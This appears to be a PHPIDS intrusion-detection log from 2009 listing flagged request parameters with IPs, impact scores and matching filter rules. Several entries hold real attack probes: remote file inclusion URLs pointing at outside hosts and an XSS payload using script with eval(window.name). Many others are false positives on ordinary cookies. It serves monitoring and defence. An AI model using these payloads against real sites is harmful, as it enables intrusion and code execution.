Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59529
Name:REQUEST.page
Value:/*
Page:/i.php?page=/%2A
IP:67.195.111.47
Impact:6
Created:2009-11-08 10:49:16
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:59530
Name:GET.page
Value:/*
Page:/i.php?page=/%2A
IP:67.195.111.47
Impact:6
Created:2009-11-08 10:49:16
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:59527
Name:REQUEST.page
Value:videos/owasp-top-5-louisville/index2.php?p=http://www.hackengine.net/scan/id1?
Page:/i.php?page=videos/owasp-top-5-louisville/index2.php?p=http://www.hackengine.net/scan/id1?
IP:81.176.229.7
Impact:20
Created:2009-11-08 07:25:37
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59528
Name:GET.page
Value:videos/owasp-top-5-louisville/index2.php?p=http://www.hackengine.net/scan/id1?
Page:/i.php?page=videos/owasp-top-5-louisville/index2.php?p=http://www.hackengine.net/scan/id1?
IP:81.176.229.7
Impact:20
Created:2009-11-08 07:25:37
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59525
Name:REQUEST.page
Value:videos/index2.php?p=http://www.hackengine.net/scan/id1?
Page:/i.php?page=videos/index2.php?p=http://www.hackengine.net/scan/id1?
IP:81.176.229.7
Impact:20
Created:2009-11-08 07:25:36
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59526
Name:GET.page
Value:videos/index2.php?p=http://www.hackengine.net/scan/id1?
Page:/i.php?page=videos/index2.php?p=http://www.hackengine.net/scan/id1?
IP:81.176.229.7
Impact:20
Created:2009-11-08 07:25:36
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59523
Name:REQUEST.page
Value:security///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.moretonisland.com.au/wav.ico?
Page:/i.php?page=security///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.moretonisland.com.au/wav.ico?
IP:216.252.64.78
Impact:26
Created:2009-11-08 06:07:18
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59524
Name:GET.page
Value:security///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.moretonisland.com.au/wav.ico?
Page:/i.php?page=security///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.moretonisland.com.au/wav.ico?
IP:216.252.64.78
Impact:26
Created:2009-11-08 06:07:18
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59519
Name:REQUEST.path
Value:/search, PREF=ID=61fb9819b630ee3a:TM=1257687876:LM=1257687876:S=kW6pWxv9To3Ldyn6
Page:/i.php?page=videos/recovercookies
IP:132.239.17.225
Impact:30
Created:2009-11-08 05:45:30
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:59520
Name:REQUEST.domain
Value:.google.de, NID=28=VDq513JnHqOh3qL8_ycTUUYA59nnq0jfTz_pRXYJ8ae0z-7d_oN9maLdUcoKFqvQvVg7wiHYpFciyM5n5uu1GoCg366MpOI2MF5lAVhcM6LVcjvnJAFM0AxhPQa7C3Mr
Page:/i.php?page=videos/recovercookies
IP:132.239.17.225
Impact:30
Created:2009-11-08 05:45:30
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:59521
Name:COOKIE.path
Value:/search, PREF=ID=61fb9819b630ee3a:TM=1257687876:LM=1257687876:S=kW6pWxv9To3Ldyn6
Page:/i.php?page=videos/recovercookies
IP:132.239.17.225
Impact:30
Created:2009-11-08 05:45:30
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:59522
Name:COOKIE.domain
Value:.google.de, NID=28=VDq513JnHqOh3qL8_ycTUUYA59nnq0jfTz_pRXYJ8ae0z-7d_oN9maLdUcoKFqvQvVg7wiHYpFciyM5n5uu1GoCg366MpOI2MF5lAVhcM6LVcjvnJAFM0AxhPQa7C3Mr
Page:/i.php?page=videos/recovercookies
IP:132.239.17.225
Impact:30
Created:2009-11-08 05:45:30
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:59517
Name:REQUEST.page
Value:security/igigle-wigle-wifi-to-google-earth-client-for-wardrive-mapping" >IGiGLE: Irongeek
Page:/i.php?page=security/igigle-wigle-wifi-to-google-earth-client-for-wardrive-mapping%22%20%3EIGiGLE:%20Irongeek&
IP:91.121.75.82
Impact:22
Created:2009-11-08 02:11:00
Details:
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59518
Name:GET.page
Value:security/igigle-wigle-wifi-to-google-earth-client-for-wardrive-mapping" >IGiGLE: Irongeek
Page:/i.php?page=security/igigle-wigle-wifi-to-google-earth-client-for-wardrive-mapping%22%20%3EIGiGLE:%20Irongeek&
IP:91.121.75.82
Impact:22
Created:2009-11-08 02:11:00
Details:
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59515
Name:REQUEST.page
Value:security/igigle-wigle-wifi-to-google-earth-client-for-wardrive-mapping" >IGiGLE: Irongeek
Page:/i.php?page=security/igigle-wigle-wifi-to-google-earth-client-for-wardrive-mapping%22%20%3EIGiGLE:%20Irongeek&
IP:91.121.75.82
Impact:22
Created:2009-11-08 02:10:59
Details:
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59516
Name:GET.page
Value:security/igigle-wigle-wifi-to-google-earth-client-for-wardrive-mapping" >IGiGLE: Irongeek
Page:/i.php?page=security/igigle-wigle-wifi-to-google-earth-client-for-wardrive-mapping%22%20%3EIGiGLE:%20Irongeek&
IP:91.121.75.82
Impact:22
Created:2009-11-08 02:10:59
Details:
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59513
Name:REQUEST.test
Value:"><script>eval(window.name)</script>
Page:/i.php?test=%22><script>eval(window.name)</script>
IP:65.55.207.133
Impact:72
Created:2009-11-07 18:28:32
Details:
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1
Description: Detects url-, name-, JSON, and referrer-contained payload attacks | Tags: xss, csrf | ID: 4
Description: Detects possible includes and typical script methods | Tags: xss, csrf, id, rfe | ID: 16
Description: Detects JavaScript object properties and methods | Tags: xss, csrf, id, rfe | ID: 17
Description: Detects very basic XSS probings | Tags: xss, csrf, id, rfe | ID: 21
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects possibly malicious html elements including some attributes | Tags: xss, csrf, id, rfe, lfi | ID: 38
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59514
Name:GET.test
Value:"><script>eval(window.name)</script>
Page:/i.php?test=%22><script>eval(window.name)</script>
IP:65.55.207.133
Impact:72
Created:2009-11-07 18:28:32
Details:
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1
Description: Detects url-, name-, JSON, and referrer-contained payload attacks | Tags: xss, csrf | ID: 4
Description: Detects possible includes and typical script methods | Tags: xss, csrf, id, rfe | ID: 16
Description: Detects JavaScript object properties and methods | Tags: xss, csrf, id, rfe | ID: 17
Description: Detects very basic XSS probings | Tags: xss, csrf, id, rfe | ID: 21
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects possibly malicious html elements including some attributes | Tags: xss, csrf, id, rfe, lfi | ID: 38
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59511
Name:REQUEST.test
Value:"><script>eval(window.name)</script>
Page:/i.php?test=%22><script>eval(window.name)</script>
IP:65.55.207.133
Impact:72
Created:2009-11-07 18:28:31
Details:
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1
Description: Detects url-, name-, JSON, and referrer-contained payload attacks | Tags: xss, csrf | ID: 4
Description: Detects possible includes and typical script methods | Tags: xss, csrf, id, rfe | ID: 16
Description: Detects JavaScript object properties and methods | Tags: xss, csrf, id, rfe | ID: 17
Description: Detects very basic XSS probings | Tags: xss, csrf, id, rfe | ID: 21
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects possibly malicious html elements including some attributes | Tags: xss, csrf, id, rfe, lfi | ID: 38
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59512
Name:GET.test
Value:"><script>eval(window.name)</script>
Page:/i.php?test=%22><script>eval(window.name)</script>
IP:65.55.207.133
Impact:72
Created:2009-11-07 18:28:31
Details:
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1
Description: Detects url-, name-, JSON, and referrer-contained payload attacks | Tags: xss, csrf | ID: 4
Description: Detects possible includes and typical script methods | Tags: xss, csrf, id, rfe | ID: 16
Description: Detects JavaScript object properties and methods | Tags: xss, csrf, id, rfe | ID: 17
Description: Detects very basic XSS probings | Tags: xss, csrf, id, rfe | ID: 21
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects possibly malicious html elements including some attributes | Tags: xss, csrf, id, rfe, lfi | ID: 38
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59509
Name:REQUEST.page
Value:security/phpids-install-notes /?_zb_path=http://www.masuccessguy.com//audio/swf??
Page:/i.php?page=security/phpids-install-notes%20%20/?_zb_path=http://www.masuccessguy.com//audio/swf??
IP:89.171.190.107
Impact:20
Created:2009-11-07 18:05:31
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59510
Name:GET.page
Value:security/phpids-install-notes /?_zb_path=http://www.masuccessguy.com//audio/swf??
Page:/i.php?page=security/phpids-install-notes%20%20/?_zb_path=http://www.masuccessguy.com//audio/swf??
IP:89.171.190.107
Impact:20
Created:2009-11-07 18:05:31
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59507
Name:REQUEST.page
Value:security/?_zb_path=http://www.masuccessguy.com//audio/swf??
Page:/i.php?page=security/?_zb_path=http://www.masuccessguy.com//audio/swf??
IP:89.171.190.107
Impact:20
Created:2009-11-07 18:05:20
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59508
Name:GET.page
Value:security/?_zb_path=http://www.masuccessguy.com//audio/swf??
Page:/i.php?page=security/?_zb_path=http://www.masuccessguy.com//audio/swf??
IP:89.171.190.107
Impact:20
Created:2009-11-07 18:05:20
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59505
Name:REQUEST.page
Value:security/?_zb_path=http://www.masuccessguy.com//audio/swf??
Page:/i.php?page=security/?_zb_path=http://www.masuccessguy.com//audio/swf??
IP:89.171.190.107
Impact:20
Created:2009-11-07 18:04:39
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59506
Name:GET.page
Value:security/?_zb_path=http://www.masuccessguy.com//audio/swf??
Page:/i.php?page=security/?_zb_path=http://www.masuccessguy.com//audio/swf??
IP:89.171.190.107
Impact:20
Created:2009-11-07 18:04:39
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59503
Name:REQUEST.page
Value:security/phpids-install-notes /?_zb_path=http://www.masuccessguy.com//audio/swf??
Page:/i.php?page=security/phpids-install-notes%20%20/?_zb_path=http://www.masuccessguy.com//audio/swf??
IP:89.171.190.107
Impact:20
Created:2009-11-07 18:04:38
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59504
Name:GET.page
Value:security/phpids-install-notes /?_zb_path=http://www.masuccessguy.com//audio/swf??
Page:/i.php?page=security/phpids-install-notes%20%20/?_zb_path=http://www.masuccessguy.com//audio/swf??
IP:89.171.190.107
Impact:20
Created:2009-11-07 18:04:38
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59501
Name:REQUEST.page
Value:security/phpids-install-notes /?_zb_path=http://www.masuccessguy.com//audio/swf??
Page:/i.php?page=security/phpids-install-notes%20%20/?_zb_path=http://www.masuccessguy.com//audio/swf??
IP:89.171.190.107
Impact:20
Created:2009-11-07 18:02:16
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59502
Name:GET.page
Value:security/phpids-install-notes /?_zb_path=http://www.masuccessguy.com//audio/swf??
Page:/i.php?page=security/phpids-install-notes%20%20/?_zb_path=http://www.masuccessguy.com//audio/swf??
IP:89.171.190.107
Impact:20
Created:2009-11-07 18:02:16
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59500
Name:GET.page
Value:security/?_zb_path=http://www.masuccessguy.com//audio/swf??
Page:/i.php?page=security/?_zb_path=http://www.masuccessguy.com//audio/swf??
IP:89.171.190.107
Impact:20
Created:2009-11-07 18:02:15
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59499
Name:REQUEST.page
Value:security/?_zb_path=http://www.masuccessguy.com//audio/swf??
Page:/i.php?page=security/?_zb_path=http://www.masuccessguy.com//audio/swf??
IP:89.171.190.107
Impact:20
Created:2009-11-07 18:02:14
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59481
Name:REQUEST.cm__tracker
Value:a:1:{i:0;s:65:"/blog/post/2920/lifting-your-click-through-rate-with-a-b-testing/";}
Page:/i.php?page=videos%2F802-11-wireless-security-class-part-1
IP:213.239.213.54
Impact:216
Created:2009-11-07 17:37:54
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59482
Name:REQUEST.IW
Value:SendToAFriend=http://www.industryweek.com/readarticle.aspx?ArticleID=20341
Page:/i.php?page=videos%2F802-11-wireless-security-class-part-1
IP:213.239.213.54
Impact:216
Created:2009-11-07 17:37:54
Details:
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59483
Name:REQUEST.language
Value:--
Page:/i.php?page=videos%2F802-11-wireless-security-class-part-1
IP:213.239.213.54
Impact:216
Created:2009-11-07 17:37:54
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:59484
Name:REQUEST.CommunityServer-UserCookie1001
Value:lv=1/1/1999 12:00:00 AM&mra=11/7/2009 2:37:19 PM
Page:/i.php?page=videos%2F802-11-wireless-security-class-part-1
IP:213.239.213.54
Impact:216
Created:2009-11-07 17:37:54
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:59485
Name:REQUEST.DB
Value:msRandX=40&ItemDetailsBeta=Y&msProduct=1782290&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150B.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150B.jpg
Page:/i.php?page=videos%2F802-11-wireless-security-class-part-1
IP:213.239.213.54
Impact:216
Created:2009-11-07 17:37:54
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:59486
Name:REQUEST.Cart
Value:PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=3976086&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:/i.php?page=videos%2F802-11-wireless-security-class-part-1
IP:213.239.213.54
Impact:216
Created:2009-11-07 17:37:54
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59487
Name:REQUEST.CFGLOBALS
Value:urltoken=CFID#=1658848&CFTOKEN#=38008515&jsessionid#=3030bf483831525c756e3c4d17a2676636a6#lastvisit={ts '2009-11-07 20:00:20'}#timecreated={ts '2009-11-07 11:47:35'}#hitcount=15#cftoken=38008515#cfid=1658848#
Page:/i.php?page=videos%2F802-11-wireless-security-class-part-1
IP:213.239.213.54
Impact:216
Created:2009-11-07 17:37:54
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.2307692307692
Converted: ((((+::

ID:59488
Name:REQUEST.exp_tracker
Value:a:4:{i:0;s:67:"/news/permalink/substance-new-realtime-3d-application-using-opengl/";i:1;s:73:"/eartotheground/item/20091106_dems_make_final_push_for_health_bill_votes/";i:2;s:71:"/apple/comment/an-open-letter-to-the-verizon-theres-a-map-for-that-ads/";i:3;s:56:"/events/detail/ryan-adams-at-the-morrison-hotel-gallery/";}
Page:/i.php?page=videos%2F802-11-wireless-security-class-part-1
IP:213.239.213.54
Impact:216
Created:2009-11-07 17:37:54
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59489
Name:REQUEST.ci_session
Value:a:4:{s:10:"session_id";s:32:"e21d32fc5521bc442985cb54f456e580";s:10:"ip_address";s:14:"213.239.213.54";s:10:"user_agent";s:50:"Mozilla/5.0 (compatible; proximic; +http://www.pro";s:13:"last_activity";s:10:"1257671884";}9f855e50a6baaf0803b7152253c9c684
Page:/i.php?page=videos%2F802-11-wireless-security-class-part-1
IP:213.239.213.54
Impact:216
Created:2009-11-07 17:37:54
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((++:

ID:59490
Name:COOKIE.cm__tracker
Value:a:1:{i:0;s:65:"/blog/post/2920/lifting-your-click-through-rate-with-a-b-testing/";}
Page:/i.php?page=videos%2F802-11-wireless-security-class-part-1
IP:213.239.213.54
Impact:216
Created:2009-11-07 17:37:54
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59491
Name:COOKIE.IW
Value:SendToAFriend=http://www.industryweek.com/readarticle.aspx?ArticleID=20341
Page:/i.php?page=videos%2F802-11-wireless-security-class-part-1
IP:213.239.213.54
Impact:216
Created:2009-11-07 17:37:54
Details:
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59492
Name:COOKIE.language
Value:--
Page:/i.php?page=videos%2F802-11-wireless-security-class-part-1
IP:213.239.213.54
Impact:216
Created:2009-11-07 17:37:54
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:59493
Name:COOKIE.CommunityServer-UserCookie1001
Value:lv=1/1/1999 12:00:00 AM&mra=11/7/2009 2:37:19 PM
Page:/i.php?page=videos%2F802-11-wireless-security-class-part-1
IP:213.239.213.54
Impact:216
Created:2009-11-07 17:37:54
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:59494
Name:COOKIE.DB
Value:msRandX=40&ItemDetailsBeta=Y&msProduct=1782290&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150B.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150B.jpg
Page:/i.php?page=videos%2F802-11-wireless-security-class-part-1
IP:213.239.213.54
Impact:216
Created:2009-11-07 17:37:54
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:59495
Name:COOKIE.Cart
Value:PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=3976086&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:/i.php?page=videos%2F802-11-wireless-security-class-part-1
IP:213.239.213.54
Impact:216
Created:2009-11-07 17:37:54
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59496
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=1658848&CFTOKEN#=38008515&jsessionid#=3030bf483831525c756e3c4d17a2676636a6#lastvisit={ts '2009-11-07 20:00:20'}#timecreated={ts '2009-11-07 11:47:35'}#hitcount=15#cftoken=38008515#cfid=1658848#
Page:/i.php?page=videos%2F802-11-wireless-security-class-part-1
IP:213.239.213.54
Impact:216
Created:2009-11-07 17:37:54
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.2307692307692
Converted: ((((+::

ID:59497
Name:COOKIE.exp_tracker
Value:a:4:{i:0;s:67:"/news/permalink/substance-new-realtime-3d-application-using-opengl/";i:1;s:73:"/eartotheground/item/20091106_dems_make_final_push_for_health_bill_votes/";i:2;s:71:"/apple/comment/an-open-letter-to-the-verizon-theres-a-map-for-that-ads/";i:3;s:56:"/events/detail/ryan-adams-at-the-morrison-hotel-gallery/";}
Page:/i.php?page=videos%2F802-11-wireless-security-class-part-1
IP:213.239.213.54
Impact:216
Created:2009-11-07 17:37:54
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59498
Name:COOKIE.ci_session
Value:a:4:{s:10:"session_id";s:32:"e21d32fc5521bc442985cb54f456e580";s:10:"ip_address";s:14:"213.239.213.54";s:10:"user_agent";s:50:"Mozilla/5.0 (compatible; proximic; +http://www.pro";s:13:"last_activity";s:10:"1257671884";}9f855e50a6baaf0803b7152253c9c684
Page:/i.php?page=videos%2F802-11-wireless-security-class-part-1
IP:213.239.213.54
Impact:216
Created:2009-11-07 17:37:54
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((++:

ID:59433
Name:REQUEST.PREF
Value:ID=0476ea5eac7fc9f2:TM=1257636028:LM=1257636028:S=-_VJl9eVH88obzos
Page:/i.php?page=videos%2Fowasp-top-5-louisville
IP:62.141.48.83
Impact:170
Created:2009-11-07 17:37:53
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:59434
Name:REQUEST.CFGLOBALS
Value:urltoken=CFID#=1654856&CFTOKEN#=27435994&jsessionid#=30307eacdd69846e5c15157f4023691a2b7b#lastvisit={ts '2009-11-07 13:48:18'}#timecreated={ts '2009-11-07 10:17:13'}#hitcount=6#cftoken=27435994#cfid=1654856#
Page:/i.php?page=videos%2Fowasp-top-5-louisville
IP:62.141.48.83
Impact:170
Created:2009-11-07 17:37:53
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.1923076923077
Converted: ((((+::

ID:59435
Name:REQUEST.DB
Value:msRandX=62&ItemDetailsBeta=Y&msProduct=1782290&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150B.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150B.jpg
Page:/i.php?page=videos%2Fowasp-top-5-louisville
IP:62.141.48.83
Impact:170
Created:2009-11-07 17:37:53
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:59436
Name:REQUEST.Cart
Value:PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=4605321&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:/i.php?page=videos%2Fowasp-top-5-louisville
IP:62.141.48.83
Impact:170
Created:2009-11-07 17:37:53
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59437
Name:REQUEST.IW
Value:SendToAFriend=http://www.industryweek.com/readarticle.aspx?ArticleID=20358
Page:/i.php?page=videos%2Fowasp-top-5-louisville
IP:62.141.48.83
Impact:170
Created:2009-11-07 17:37:53
Details:
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59438
Name:REQUEST._designrelated_id
Value:BAh7CDoQZXhwaXJ5X3RpbWV1OglUaW1lDRZpG4A7TUHHOhJjcmVhdGlvbl90 aW1ldTsGDfZoG4DD4m7GIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG bGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--8b79c2ed5d395483c2803613f3c3b143223ac77f
Page:/i.php?page=videos%2Fowasp-top-5-louisville
IP:62.141.48.83
Impact:170
Created:2009-11-07 17:37:53
Details:
bGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--8b79c2ed5d395483c2803613f3c3b143223ac77f
Impact: 7 | Tags: xss, csrf, id, rfe, lfi
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

